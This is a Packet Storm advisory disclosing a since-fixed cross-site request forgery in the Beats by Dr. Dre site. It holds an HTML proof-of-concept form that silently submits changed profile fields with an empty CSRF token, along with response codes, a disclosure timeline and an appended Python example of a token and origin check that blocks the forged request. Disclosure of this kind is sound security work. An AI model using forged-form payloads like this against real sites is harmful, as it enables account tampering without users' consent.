Beats By Dre Cross Site Request Forgery

Type packetstorm
Reporter Aaditya Purani
Modified 2016-07-31T00:00:00


I am Aaditya Purani, and I found a CSRF (Cross Site Request Forgery)  
on Beats by Dr. Dre which could lead to full account takeover and  
information change by just sending a maliciously crafted link to the user.  
Proof of Concept:  
<!-- CSRF PoC - By Aaditya Purani -->  
<form method='POST' action="  
<input type="hidden" name="firstName" value="hacked" />  
<input type="hidden" name="lastName" value="hackerone" />  
<input type="hidden" name="emailAddress" value="" />  
<input type="hidden" name="zip" value="" />  
<input type="hidden" name="phone" value="" />  
<input type="hidden" name="csrf_token" value="" />  
<input type="hidden" name="isEmailSubscription" value="true" />  
<input type="hidden" name="isAlreadySubscribed" value="false" />  
<input type="submit" value="Submit request" />  
</form>  
Response :  
{"isCustomerSavedSuccessfully": true, "unsubscribeStatus": null } -> Attack
{"isCustomerSavedSuccessfully": false, "unsubscribeStatus": null } -> Attack Unsuccessful
Clicking on this link would change the details of any user. I have written a
complete blog here:
Video PoC:  
Apple has acknowledged me in their Hall of Fame:
October 8th 2015 - Reported
October 23rd 2015 - Triaged
November 6th 2015 - Responded that "Matter is being investigated"
January 18th 2016 - Fixed
June 20th 2016 - Acknowledged
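
Added example (not part of the original advisory and not the site's code): the page does not say why the forged POST was accepted, so this sketch shows one server-side check that would refuse it, using a session-bound HMAC token plus an Origin/Referer check on a profile-update handler with the PoC's field names. The handler name, the `reason` key, the origin `https://shop.example`, and the session id are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: per-deployment secret, generated here so the example runs offline.
SERVER_KEY = secrets.token_bytes(32)
ALLOWED_ORIGIN = "https://shop.example"  # placeholder origin, not the real site

def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session: HMAC-SHA256(server key, session id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def is_same_origin(headers: dict) -> bool:
    """Use Origin when present, else Referer; reject when both are absent."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == ALLOWED_ORIGIN
    return headers.get("Referer", "").startswith(ALLOWED_ORIGIN + "/")

def update_profile(session_id: str, headers: dict, form: dict) -> dict:
    """Hypothetical handler for the profile fields that appear in the PoC form."""
    if not is_same_origin(headers):
        return {"isCustomerSavedSuccessfully": False, "reason": "cross-site request"}
    supplied = (form.get("csrf_token") or "").encode()
    expected = issue_csrf_token(session_id).encode()
    # An absent or empty token fails; the comparison is constant-time.
    if not supplied or not hmac.compare_digest(supplied, expected):
        return {"isCustomerSavedSuccessfully": False, "reason": "bad csrf_token"}
    # A real handler would persist firstName, lastName, emailAddress, ... here.
    return {"isCustomerSavedSuccessfully": True, "reason": None}

# Constructed sample requests (not captured traffic).
SESSION = "constructed-session-id"
SAME_SITE = {"Origin": ALLOWED_ORIGIN}
CROSS_SITE = {"Origin": "https://other.example"}
FORGED_FORM = {"firstName": "hacked", "lastName": "hackerone", "csrf_token": ""}
LEGIT_FORM = {"firstName": "Alice", "lastName": "Example",
              "csrf_token": issue_csrf_token(SESSION)}

if __name__ == "__main__":
    print(update_profile(SESSION, CROSS_SITE, FORGED_FORM))
    print(update_profile(SESSION, SAME_SITE, FORGED_FORM))
    print(update_profile(SESSION, SAME_SITE, LEGIT_FORM))
```

The forged form fails both checks independently: the cross-site Origin is refused first, and even with a same-site Origin the empty `csrf_token` is rejected.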